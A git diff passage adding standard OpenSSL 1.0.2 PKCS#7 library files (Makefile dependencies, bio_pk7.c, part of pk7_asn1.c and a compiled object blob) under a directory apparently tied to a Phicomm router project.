+pk7_doit.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+pk7_doit.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pk7_doit.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pk7_doit.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pk7_doit.o: ../../include/openssl/x509v3.h ../cryptlib.h pk7_doit.c
+pk7_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+pk7_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pk7_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pk7_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pk7_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pk7_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pk7_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pk7_lib.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pk7_lib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pk7_lib.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pk7_lib.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+pk7_lib.o: pk7_lib.c
+pk7_mime.o: ../../e_os.h ../../include/openssl/asn1.h
+pk7_mime.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pk7_mime.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pk7_mime.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pk7_mime.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pk7_mime.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pk7_mime.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pk7_mime.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+pk7_mime.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pk7_mime.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pk7_mime.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pk7_mime.o: ../cryptlib.h pk7_mime.c
+pk7_smime.o: ../../e_os.h ../../include/openssl/asn1.h
+pk7_smime.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pk7_smime.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pk7_smime.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pk7_smime.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pk7_smime.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pk7_smime.o: ../../include/openssl/opensslconf.h
+pk7_smime.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pk7_smime.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pk7_smime.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pk7_smime.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pk7_smime.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+pk7_smime.o: ../cryptlib.h pk7_smime.c
+pkcs7err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+pkcs7err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pkcs7err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+pkcs7err.o: ../../include/openssl/opensslconf.h
+pkcs7err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pkcs7err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pkcs7err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pkcs7err.o: pkcs7err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/Makefile.save
new file mode 100644
index 0000000..64ef95b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/Makefile.save
@@ -0,0 +1,171 @@
+#
+# OpenSSL/crypto/pkcs7/Makefile
+#
+
+DIR=	pkcs7
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+PEX_LIBS=
+EX_LIBS=
+ 
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	pk7_asn1.c pk7_lib.c pkcs7err.c pk7_doit.c pk7_smime.c pk7_attr.c \
+	pk7_mime.c bio_pk7.c
+LIBOBJ= pk7_asn1.o pk7_lib.o pkcs7err.o pk7_doit.o pk7_smime.o pk7_attr.o \
+	pk7_mime.o bio_pk7.o
+
+SRC= $(LIBSRC)
+
+EXHEADER=  pkcs7.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+test:
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff enc dec sign verify
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+bio_pk7.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+bio_pk7.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bio_pk7.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bio_pk7.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+bio_pk7.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_pk7.o: ../../include/openssl/symhacks.h bio_pk7.c
+pk7_asn1.o: ../../e_os.h ../../include/openssl/asn1.h
+pk7_asn1.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+pk7_asn1.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+pk7_asn1.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pk7_asn1.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pk7_asn1.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pk7_asn1.o: ../../include/openssl/opensslconf.h
+pk7_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pk7_asn1.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pk7_asn1.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pk7_asn1.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pk7_asn1.o: ../../include/openssl/x509_vfy.h ../cryptlib.h pk7_asn1.c
+pk7_attr.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+pk7_attr.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pk7_attr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pk7_attr.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pk7_attr.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pk7_attr.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pk7_attr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pk7_attr.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pk7_attr.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pk7_attr.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pk7_attr.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pk7_attr.o: ../../include/openssl/x509_vfy.h pk7_attr.c
+pk7_doit.o: ../../e_os.h ../../include/openssl/asn1.h
+pk7_doit.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pk7_doit.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pk7_doit.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pk7_doit.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pk7_doit.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pk7_doit.o: ../../include/openssl/opensslconf.h
+pk7_doit.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pk7_doit.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+pk7_doit.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pk7_doit.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pk7_doit.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pk7_doit.o: ../../include/openssl/x509v3.h ../cryptlib.h pk7_doit.c
+pk7_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+pk7_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pk7_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pk7_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pk7_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pk7_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pk7_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pk7_lib.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pk7_lib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pk7_lib.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pk7_lib.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+pk7_lib.o: pk7_lib.c
+pk7_mime.o: ../../e_os.h ../../include/openssl/asn1.h
+pk7_mime.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pk7_mime.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pk7_mime.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pk7_mime.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pk7_mime.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pk7_mime.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pk7_mime.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+pk7_mime.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pk7_mime.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pk7_mime.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pk7_mime.o: ../cryptlib.h pk7_mime.c
+pk7_smime.o: ../../e_os.h ../../include/openssl/asn1.h
+pk7_smime.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pk7_smime.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+pk7_smime.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pk7_smime.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pk7_smime.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pk7_smime.o: ../../include/openssl/opensslconf.h
+pk7_smime.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pk7_smime.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pk7_smime.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pk7_smime.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pk7_smime.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+pk7_smime.o: ../cryptlib.h pk7_smime.c
+pkcs7err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+pkcs7err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pkcs7err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+pkcs7err.o: ../../include/openssl/opensslconf.h
+pkcs7err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pkcs7err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pkcs7err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pkcs7err.o: pkcs7err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/bio_pk7.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/bio_pk7.c
new file mode 100644
index 0000000..fae1c56
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/bio_pk7.c
@@ -0,0 +1,70 @@
+/* bio_pk7.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/asn1.h>
+#include <openssl/pkcs7.h>
+#include <openssl/bio.h>
+
+#if !defined(OPENSSL_SYSNAME_NETWARE) && !defined(OPENSSL_SYSNAME_VXWORKS)
+# include <memory.h>
+#endif
+#include <stdio.h>
+
+/* Streaming encode support for PKCS#7 */
+
+BIO *BIO_new_PKCS7(BIO *out, PKCS7 *p7)
+{
+    return BIO_new_NDEF(out, (ASN1_VALUE *)p7, ASN1_ITEM_rptr(PKCS7));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/bio_pk7.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/bio_pk7.o
new file mode 100644
index 0000000000000000000000000000000000000000..a3335ae3085f76b822a79a281fdef69259ae3628
GIT binary patch
literal 1608
zcmbtU&2G~`5FR&$1_+`ckU&Mq;($QVRRTyUJ)ktf2|rO2(e{WeJGeh;<3#pGv>-uW
z0Er_<9)(BXH8>(}2&v4hcN}N2FYrmT`_1Q>o&A~QgVSx#Sr#xXcnnjIRe*A7${UI{
z;5<~|=Y<=;o_@SS%6BDqTCG+4_Le^h<-~p@9*F94tv*q1?fw0#s6M=t$SNA<aau$>
zh1OZ$f;oV%q;a{+$O+clmtY+(T1%CM@+aIN>DSelBwy3QiOw_+KTh%jO1USdJ@77O
zvr1~$vl@9NIQ_S%^o0VwT%gl!%;FrnmoodLJ0n~}W3B`}+$_*n3Uu)IM(%jOE(Xwi
z)^o$)joW|G+NgsX-8~6zr`v0;b=_XOz2R)Sn`_Ok<EFvuPn<TD=9A((!dbN6CkZO_
z5kYTDoOK&Hf#S(hi1=tIJs(6Yqh#J?76k{Mkinq@@!FFf2tSTN3`WCY5TX{2WFWAY
zmSgD+_O-tgPQ*AGje|%Yflw<1yY6=64TH4g{}3CKsmII?XrM+g-^l!pEny7ZO#>~9
zzP^;I7U@nYmpkXG)^BOu?AX5kZcb+Xdl*1#{%d{>b7@W9CsGBjf0qS4bA6syQD>eF
zeV27I+>CvW->COydI<evG=i<h>A?5LijRcWH1ogc0P|dC{ws{jd%t77Aiop6ALVjB
x>v^@Q^fww1EBe6nKX3-k%qPu!JCvZT>pSFRpqERPi^%fwKkNL1G%_J({vQs1Y-Rue

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_asn1.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_asn1.c
new file mode 100644
index 0000000..9c0a439
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs7/pk7_asn1.c
@@ -0,0 +1,251 @@
+/* pk7_asn.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/pkcs7.h>
+#include <openssl/x509.h>
+
+/* PKCS#7 ASN1 module */
+
+/* This is the ANY DEFINED BY table for the top level PKCS#7 structure */
+
+ASN1_ADB_TEMPLATE(p7default) = ASN1_EXP_OPT(PKCS7, d.other, ASN1_ANY, 0);
+
+ASN1_ADB(PKCS7) = {
+        ADB_ENTRY(NID_pkcs7_data, ASN1_NDEF_EXP_OPT(PKCS7, d.data, ASN1_OCTET_STRING_NDEF, 0)),
+        ADB_ENTRY(NID_pkcs7_signed, ASN1_NDEF_EXP_OPT(PKCS7, d.sign, PKCS7_SIGNED, 0)),
+        ADB_ENTRY(NID_pkcs7_enveloped, ASN1_NDEF_EXP_OPT(PKCS7, d.enveloped, PKCS7_ENVELOPE, 0)),
+        ADB_ENTRY(NID_pkcs7_signedAndEnveloped, ASN1_NDEF_EXP_OPT(PKCS7, d.signed_and_enveloped, PKCS7_SIGN_ENVELOPE, 0)),
+        ADB_ENTRY(NID_pkcs7_digest, ASN1_NDEF_EXP_OPT(PKCS7, d.digest, PKCS7_DIGEST, 0)),
+        ADB_ENTRY(NID_pkcs7_encrypted, ASN1_NDEF_EXP_OPT(PKCS7, d.encrypted, PKCS7_ENCRYPT, 0))
+} ASN1_ADB_END(PKCS7, 0, type, 0, &p7default_tt, NULL);
+
+/* PKCS#7 streaming support */
+static int pk7_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                  void *exarg)
+{
+    ASN1_STREAM_ARG *sarg = exarg;
+    PKCS7 **pp7 = (PKCS7 **)pval;
+
+    switch (operation) {
+
+    case ASN1_OP_STREAM_PRE:
+        if (PKCS7_stream(&sarg->boundary, *pp7) <= 0)
+            return 0;
+    case ASN1_OP_DETACHED_PRE:
+        sarg->ndef_bio = PKCS7_dataInit(*pp7, sarg->out);
+        if (!sarg->ndef_bio)
+            return 0;
+        break;
+
+    case ASN1_OP_STREAM_POST:
+    case ASN1_OP_DETACHED_POST:
+        if (PKCS7_dataFinal(*pp7, sarg->ndef_bio) <= 0)
+            return 0;
+        break;
+
+    }
+    return 1;
+}
+
+ASN1_NDEF_SEQUENCE_cb(PKCS7, pk7_cb) = {
+        ASN1_SIMPLE(PKCS7, type, ASN1_OBJECT),
+        ASN1_ADB_OBJECT(PKCS7)
+}ASN1_NDEF_SEQUENCE_END_cb(PKCS7, PKCS7)
+
+IMPLEMENT_ASN1_FUNCTIONS(PKCS7)
+
+IMPLEMENT_ASN1_NDEF_FUNCTION(PKCS7)
+
+IMPLEMENT_ASN1_DUP_FUNCTION(PKCS7)
+
+ASN1_NDEF_SEQUENCE(PKCS7_SIGNED) = {
+        ASN1_SIMPLE(PKCS7_SIGNED, version, ASN1_INTEGER),
+        ASN1_SET_OF(PKCS7_SIGNED, md_algs, X509_ALGOR),
+        ASN1_SIMPLE(PKCS7_SIGNED, contents, PKCS7),
+        ASN1_IMP_SEQUENCE_OF_OPT(PKCS7_SIGNED, cert, X509, 0),
+        ASN1_IMP_SET_OF_OPT(PKCS7_SIGNED, crl, X509_CRL, 1),
+        ASN1_SET_OF(PKCS7_SIGNED, signer_info, PKCS7_SIGNER_INFO)
+} ASN1_NDEF_SEQUENCE_END(PKCS7_SIGNED)
+
+IMPLEMENT_ASN1_FUNCTIONS(PKCS7_SIGNED)
+
+/* Minor tweak to operation: free up EVP_PKEY */
+static int si_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                 void *exarg)
+{
+    if (operation == ASN1_OP_FREE_POST) {
+        PKCS7_SIGNER_INFO *si = (PKCS7_SIGNER_INFO *)*pval;
+        EVP_PKEY_free(si->pkey);
+    }
+    return 1;
+}
+
+ASN1_SEQUENCE_cb(PKCS7_SIGNER_INFO, si_cb) = {
+        ASN1_SIMPLE(PKCS7_SIGNER_INFO, version, ASN1_INTEGER),
+        ASN1_SIMPLE(PKCS7_SIGNER_INFO, issuer_and_serial, PKCS7_ISSUER_AND_SERIAL),
+        ASN1_SIMPLE(PKCS7_SIGNER_INFO, digest_alg, X509_ALGOR),
+        /* NB this should be a SET OF but we use a SEQUENCE OF so the
+         * original order * is retained when the structure is reencoded.
+         * Since the attributes are implicitly tagged this will not affect
+         * the encoding.
+         */
+        ASN1_IMP_SEQUENCE_OF_OPT(PKCS7_SIGNER_INFO, auth_attr, X509_ATTRIBUTE, 0),
+        ASN1_SIMPLE(PKCS7_SIGNER_INFO, digest_enc_alg, X509_ALGOR),
+        ASN1_SIMPLE(PKCS7_SIGNER_INFO, enc_digest, ASN1_OCTET_STRING),
+        ASN1_IMP_SET_OF_OPT(PKCS7_SIGNER_INFO, unauth_attr, X509_ATTRIBUTE, 1)
+} ASN1_SEQUENCE_END_cb(PKCS7_SIGNER_INFO, PKCS7_SIGNER_INFO)
+
+IMPLEMENT_ASN1_FUNCTIONS(PKCS7_SIGNER_INFO)
+
+ASN1_SEQUENCE(PKCS7_ISSUER_AND_SERIAL) = {
+        ASN1_SIMPLE(PKCS7_ISSUER_AND_SERIAL, issuer, X509_NAME),
+        ASN1_SIMPLE(PKCS7_ISSUER_AND_SERIAL, serial, ASN1_INTEGER)
+} ASN1_SEQUENCE_END(PKCS7_ISSUER_AND_SERIAL)
+
+IMPLEMENT_ASN1_FUNCTIONS(PKCS7_ISSUER_AND_SERIAL)
+
+ASN1_NDEF_SEQUENCE(PKCS7_ENVELOPE) = {
+        ASN1_SIMPLE(PKCS7_ENVELOPE, version, ASN1_INTEGER),
+        ASN1_SET_OF(PKCS7_ENVELOPE, recipientinfo, PKCS7_RECIP_INFO),
+        ASN1_SIMPLE(PKCS7_ENVELOPE, enc_data, PKCS7_ENC_CONTENT)
+} ASN1_NDEF_SEQUENCE_END(PKCS7_ENVELOPE)
+
+IMPLEMENT_ASN1_FUNCTIONS(PKCS7_ENVELOPE)
+
+/* Minor tweak to operation: free up X509 */
+static int ri_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                 void *exarg)
+{
+    if (operation == ASN1_OP_FREE_POST) {
+        PKCS7_RECIP_INFO *ri = (PKCS7_RECIP_INFO *)*pval;
+        X509_free(ri->cert);
+    }
+    return 1;
+}
+
+ASN1_SEQUENCE_cb(PKCS7_RECIP_INFO, ri_cb) = {
+        ASN1_SIMPLE(PKCS7_RECIP_INFO, version, ASN1_INTEGER),
+        ASN1_SIMPLE(PKCS7_RECIP_INFO, issuer_and_serial, PKCS7_ISSUER_AND_SERIAL),
+        ASN1_SIMPLE(PKCS7_RECIP_INFO, key_enc_algor, X509_ALGOR),
+        ASN1_SIMPLE(PKCS7_RECIP_INFO, enc_key, ASN1_OCTET_STRING)
+} ASN1_SEQUENCE_END_cb(PKCS7_RECIP_INFO, PKCS7_RECIP_INFO)
+
+IMPLEMENT_ASN1_FUNCTIONS(PKCS7_RECIP_INFO)
+
+ASN1_NDEF_SEQUENCE(PKCS7_ENC_CONTENT) = {
+        ASN1_SIMPLE(PKCS7_ENC_CONTENT, content_type, ASN1_OBJECT),
+        ASN1_SIMPLE(PKCS7_ENC_CONTENT, algorithm, X509_ALGOR),
+        ASN1_IMP_OPT(PKCS7_ENC_CONTENT, enc_data, ASN1_OCTET_STRING_NDEF, 0)
+} ASN1_NDEF_SEQUENCE_END(PKCS7_ENC_CONTENT)
+
+IMPLEMENT_ASN1_FUNCTIONS(PKCS7_ENC_CONTENT)
+
+ASN1_NDEF_SEQUENCE(PKCS7_SIGN_ENVELOPE) = {
+        ASN1_SIMPLE(PKCS7_SIGN_ENVELOPE, version, ASN1_INTEGER),
+        ASN1_SET_OF(PKCS7_SIGN_ENVELOPE, recipientinfo, PKCS7_RECIP_INFO),
+        ASN1_SET_OF(PKCS7_SIGN_ENVELOPE, md_algs, X509_ALGOR),
